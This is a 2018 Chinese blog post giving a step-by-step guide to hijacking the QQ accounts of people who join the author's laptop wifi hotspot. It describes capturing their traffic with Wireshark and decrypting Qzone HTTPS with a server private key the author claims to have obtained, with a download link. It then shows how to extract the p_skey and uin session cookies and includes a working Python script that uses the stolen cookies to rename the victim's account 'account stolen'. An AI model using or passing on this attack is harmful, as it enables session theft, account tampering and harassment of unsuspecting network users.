盗取连接你wifi的人的qq

#本文内容仅供个人娱乐学习

思路:

使用wireshark监听笔记本的wifi热点,拦截捕获连接你的wifi热点的人的手机qq网络数据包,从网络数据包中分析取出两个qq空间的两个coookie值,使用cookie值修改掉连接你的wifi的人的qq昵称,从而制造账号被盗的假象。

实现:

所需工具:wireshark数据包分析系统,能启用wifi热点的笔记本,一门可以输出http请求的编程语言。

一、启用wifi热点

二、确定wifi热点的接口名称

三、打开wireshark监听这个网络接口

四、用手机连接这个wifi热点,然后打开手机qq浏览一下动态(qq空间)

 

五、解密wireshark捕获的数据包

未解密的数据流:

qq空间使用了https协议,wireshark无法自动解密https数据流,我们给wireshark提供一个qq空间的服务器证书私钥就可以解密qq空间的数据流了。

这里我已经拿到了qq空间的私钥,qzone.key下载地址:https://pan.baidu.com/s/1HeF9wLMOTVXA8kqWv6ZurQ

配置方法请见:http://www.cnblogs.com/aucy/p/9082429.html

解密后的数据流:

六、解密后在wireshark输入筛选规则“http.cookie”,找到“p_skey”与对应的“uin”这俩cookie值

 

七、修改目标qq昵称

数据包配置:

url:https://mobile.qzone.qq.com/profile_mod

cookie:p_uin=<uin值> p_skey=<p_skey值>

data:format=json&nickname=<想要改的昵称>&birthyear=2018&birthmonth=1&birthday=1

我这里使用python发送数据包:

from urllib import request

def HTTP_POST(url,data,headers):
    req=request.Request(url,bytes(data,"utf-8"),headers)
    res=request.urlopen(req)
    print(res.read())

def ModNick(nick,cookies):
    url="https://mobile.qzone.qq.com/profile_mod"
    data="format=json&nickname="+nick+"&birthyear=2018&birthmonth=1&birthday=1"
    headers={
        "cookie":cookies
    }
    HTTP_POST(url,data,headers)

if __name__ == '__main__':
    ModNick("账号已被盗","p_uin=o2221234077; p_skey=W7IF8j7lBIh3UeRdQq1wKS9ToHAKuJnKsjXgzOQmK5w_;")

 

posted @ 2018-05-26 12:19  池温希傲  阅读(1494)  评论(0编辑  收藏  举报